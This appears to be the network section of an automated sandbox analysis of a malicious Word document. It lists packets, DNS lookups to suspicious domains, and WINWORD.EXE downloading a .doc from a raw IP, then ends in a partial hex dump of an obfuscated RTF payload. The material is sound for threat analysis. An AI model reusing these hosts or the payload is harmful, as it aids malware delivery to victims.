                                                                                Nov 22, 2022 05:10:38.803664923 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803710938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803756952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803818941 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803924084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803989887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804049015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804059982 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.804127932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804195881 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804203033 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.804240942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804303885 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.804446936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804500103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804569960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804577112 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.804613113 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804792881 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804836988 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.804858923 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.804949045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.805012941 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.805018902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.805077076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.805150986 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.805234909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958072901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958139896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958189964 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958210945 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958262920 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958268881 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958353043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958395958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958415031 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958460093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958517075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958523989 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958594084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958636045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958655119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958698034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958759069 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958789110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958842039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.958900928 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.958961010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959014893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959074020 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.959083080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959141016 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959202051 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.959301949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959357023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959469080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959537983 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.959602118 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959670067 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959712029 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.959723949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959780931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959840059 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.959924936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.959975004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.960033894 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.960092068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.960130930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.960186005 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.113593102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113668919 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113711119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113749027 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113796949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113852024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113851070 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.113893032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.113900900 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.113962889 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.114022017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114063025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114131927 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.114166021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114207029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114275932 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.114362001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114401102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114490986 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.114540100 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114609003 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114649057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114705086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114722013 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.114813089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114900112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114965916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.114972115 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.115170956 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115323067 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115395069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115397930 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.115530014 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115583897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115643024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115664959 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.115701914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115766048 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.115840912 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115915060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.115993977 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.116038084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.116126060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.116194963 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.116214037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268289089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268348932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268413067 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268451929 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.268455029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268496990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268506050 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.268552065 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268569946 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.268599033 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268650055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268668890 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.268783092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.268853903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.269083977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269129992 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269200087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.269226074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269267082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269335032 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.269428015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269468069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.269536018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.270186901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270230055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270298004 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.270334959 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270374060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270431042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270446062 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.270533085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270605087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.270728111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270828009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270869017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270927906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.270948887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.270987988 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271032095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.271080017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271229982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271270990 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.271271944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271342039 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.271431923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271472931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.271538973 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.276323080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423011065 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423146963 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423209906 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423255920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423281908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.423281908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.423295021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423333883 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423368931 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.423372030 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423408031 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:39.423448086 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:39.637883902 CET4918080192.168.2.22183.78.168.24
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 22, 2022 05:08:03.749707937 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:04.513225079 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:05.277755022 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:06.357166052 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:07.118751049 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:07.883259058 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:22.081269979 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:22.844923973 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:23.609374046 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:08:41.507633924 CET138138192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:09:01.401972055 CET5440853192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:01.983827114 CET53544088.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:01.992276907 CET5010853192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:02.642194986 CET53501088.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:05.180762053 CET5472353192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:05.199959040 CET53547238.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:05.201782942 CET5806253192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:05.374816895 CET53580628.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:08.756139994 CET5670353192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:09.098979950 CET53567038.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:09.202383041 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:09:09.961042881 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:09:10.725474119 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:09:16.090135098 CET5924153192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:16.107389927 CET53592418.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:09:16.121321917 CET5524453192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:09:16.797178984 CET53552448.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:10:08.703366041 CET5395853192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:10:08.722141027 CET53539588.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:10:08.757716894 CET5602053192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:10:08.775742054 CET53560208.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:10:11.266652107 CET138138192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:10:16.152338982 CET5166353192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:10:16.491389990 CET53516638.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:10:20.476651907 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:10:21.228115082 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:10:21.469504118 CET5102053192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:10:21.992572069 CET137137192.168.2.22192.168.2.255
                                                                                Nov 22, 2022 05:10:22.069667101 CET53510208.8.8.8192.168.2.22
                                                                                Nov 22, 2022 05:10:28.073739052 CET6062253192.168.2.228.8.8.8
                                                                                Nov 22, 2022 05:10:28.091100931 CET53606228.8.8.8192.168.2.22
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 22, 2022 05:09:01.401972055 CET192.168.2.228.8.8.80xc4a9Standard query (0)esplogem.gaA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:01.992276907 CET192.168.2.228.8.8.80xca6dStandard query (0)esplogem.gaA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:05.180762053 CET192.168.2.228.8.8.80x1666Standard query (0)ndtcconsultant.comA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:05.201782942 CET192.168.2.228.8.8.80x723cStandard query (0)ndtcconsultant.comA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:08.756139994 CET192.168.2.228.8.8.80xf2feStandard query (0)www.hzncars.com.myA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:16.090135098 CET192.168.2.228.8.8.80xd550Standard query (0)esplogem.gaA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:16.121321917 CET192.168.2.228.8.8.80xe700Standard query (0)esplogem.gaA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.703366041 CET192.168.2.228.8.8.80x1001Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.757716894 CET192.168.2.228.8.8.80x5ff5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:16.152338982 CET192.168.2.228.8.8.80x4e46Standard query (0)www.hzncars.com.myA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:21.469504118 CET192.168.2.228.8.8.80x69e9Standard query (0)dropbuyinc.gaA (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:28.073739052 CET192.168.2.228.8.8.80x4c80Standard query (0)www.hzncars.com.myA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 22, 2022 05:09:01.983827114 CET8.8.8.8192.168.2.220xc4a9No error (0)esplogem.ga34.174.217.42A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:02.642194986 CET8.8.8.8192.168.2.220xca6dNo error (0)esplogem.ga34.174.217.42A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:05.199959040 CET8.8.8.8192.168.2.220x1666No error (0)ndtcconsultant.com69.160.38.3A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:05.374816895 CET8.8.8.8192.168.2.220x723cNo error (0)ndtcconsultant.com69.160.38.3A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:09.098979950 CET8.8.8.8192.168.2.220xf2feNo error (0)www.hzncars.com.my183.78.168.24A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:16.107389927 CET8.8.8.8192.168.2.220xd550No error (0)esplogem.ga34.174.217.42A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:09:16.797178984 CET8.8.8.8192.168.2.220xe700No error (0)esplogem.ga34.174.217.42A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.722141027 CET8.8.8.8192.168.2.220x1001No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.722141027 CET8.8.8.8192.168.2.220x1001No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.722141027 CET8.8.8.8192.168.2.220x1001No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.722141027 CET8.8.8.8192.168.2.220x1001No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.722141027 CET8.8.8.8192.168.2.220x1001No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.775742054 CET8.8.8.8192.168.2.220x5ff5No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.775742054 CET8.8.8.8192.168.2.220x5ff5No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.775742054 CET8.8.8.8192.168.2.220x5ff5No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.775742054 CET8.8.8.8192.168.2.220x5ff5No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:08.775742054 CET8.8.8.8192.168.2.220x5ff5No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:16.491389990 CET8.8.8.8192.168.2.220x4e46No error (0)www.hzncars.com.my183.78.168.24A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:22.069667101 CET8.8.8.8192.168.2.220x69e9No error (0)dropbuyinc.ga34.174.217.42A (IP address)IN (0x0001)false
                                                                                Nov 22, 2022 05:10:28.091100931 CET8.8.8.8192.168.2.220x4c80No error (0)www.hzncars.com.my183.78.168.24A (IP address)IN (0x0001)false
                                                                                • ndtcconsultant.com
                                                                                • api.ipify.org
                                                                                • 192.227.132.49
                                                                                • ygujr.net
                                                                                  • esplogem.ga
                                                                                • wrbatho.org
                                                                                • awqeauxao.com
                                                                                • posyylxo.org
                                                                                • yljegbhrf.net
                                                                                • www.hzncars.com.my
                                                                                • dropbuyinc.ga
                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.224917469.160.38.3443C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.22491773.232.242.170443C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                TimestampkBytes transferredDirectionData


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.2249171192.227.132.4980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:08:13.108572006 CET1OUTGET /000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc HTTP/1.1
                                                                                Accept: */*
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: 192.227.132.49
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:08:13.230000019 CET2INHTTP/1.1 200 OK
                                                                                Date: Tue, 22 Nov 2022 04:08:13 GMT
                                                                                Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
                                                                                Last-Modified: Mon, 21 Nov 2022 14:21:09 GMT
                                                                                ETag: "49c8-5edfbc44cc6ee"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 18888
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/msword
                                                                                Data Raw: 7b 5c 72 74 0d 09 09 09 09 09 09 09 09 7b 5c 6d 63 53 70 33 33 37 38 38 37 34 36 31 20 5c df 7d 0d 7b 5c 39 35 34 31 38 34 31 31 30 33 40 31 b5 30 2d b5 3c 21 3a 21 2a 25 3a 7c 40 3e 2b 2c 31 21 26 35 2f 5b 5d 7e 3e 2a 3f 2f 2c 7e a7 30 33 3d 3f 39 33 37 b0 37 3f 5d 3d 2e 34 b5 2c 39 24 3a 34 29 2d 3f 5f 5b 5b 32 3e 21 25 36 36 5f 24 5f 5b 34 2d 7c 24 36 3f 7c 5d 37 3f 3b 34 3f 3e 37 3f 33 7c 28 32 33 29 28 39 3f 25 39 25 3c 2d 31 40 3f 2b 39 a7 21 3a 3a 38 60 2e 2b b0 3f 3b 35 7e 28 5e 37 33 34 3b 21 37 b5 5b 7e 2c 3f 25 3a 38 32 2b 3f 2f 2e 3f 60 24 3b 25 28 2a 25 39 60 2a 30 2a 3f 30 b0 33 5d 7c 2a 3f 7e 5b 3f 5b 39 2a 38 5b 5d 34 24 5e 2f 21 38 24 3f 24 3f 32 33 3b 34 2e b0 39 27 23 a7 a7 32 28 7c 5f 3f 2e 2d 2f 2e 35 5b 27 31 30 32 27 b5 21 3c 38 25 b0 60 37 a7 25 25 2a 36 7e 3f 5e 37 23 33 30 27 3f 2e 2f 7e 60 40 5d 36 34 5b 33 b5 3b 23 2b 3d 28 3d 26 33 35 32 37 3f 5d b5 2b 2c 28 40 27 37 32 5f 2f 2c 5d 32 3f 38 2e 23 3a 2f 5e 2d 32 2b 2b 2d 3b 30 24 3b 2c 3c 24 39 3f 3b 37 3f 25 7c 5b 3e 5e 40 36 5b 23 37 39 7c 7c 39 29 24 a7 b0 25 36 2e a7 3f 5b 39 b5 34 3f b0 2f 34 3f a7 30 5b 33 2c 2d a7 2c 3c 35 3f 3c 2f 38 37 7e 3b 3f 5b 37 25 3f 21 b0 31 3f 60 b0 7e 24 5e 34 36 5b 5e 33 2c 40 3a 3d 5e 34 5f 5f 21 39 28 5b 3f 2a 2c 2f 28 24 35 3a 27 7c 2b b5 26 37 33 3c 3d 5b 32 b5 35 3a 23 40 7c 35 b0 3e 27 25 25 31 28 5d 3f 37 2b 36 40 2b 3f 2e 37 3d 40 2b 5e b0 37 b5 34 3e 3f 3f 7c 35 25 30 3f 3f 31 3b 25 28 60 31 31 29 21 33 b0 40 3f 3c 5e 2b 36 3c b0 26 30 39 3c 2e 5e 31 29 a7 5e 2d 3d 28 40 5b 35 3d 31 39 26 3f 2c 37 40 34 3f 2a 3f 29 2d 2c 2d b5 5f 3f 3f 3c 2c 23 21 2b 36 26 5d 3f 2a 7e 37 29 2c 23 28 b5 30 5e b0 3b 7e 23 31 21 40 2b 5d 3f 2f 2a 24 25 25 39 31 23 31 3f 25 2e 35 27 3f 3f 2a 3f 2f a7 40 b0 36 40 2c 2b 37 25 3c b5 3f 2c 5f 36 2a 30 2e 7c 2e 29 3f 3e 7e 2a 3c 32 33 32 38 3c 26 2f b0 3f 2b 40 3f 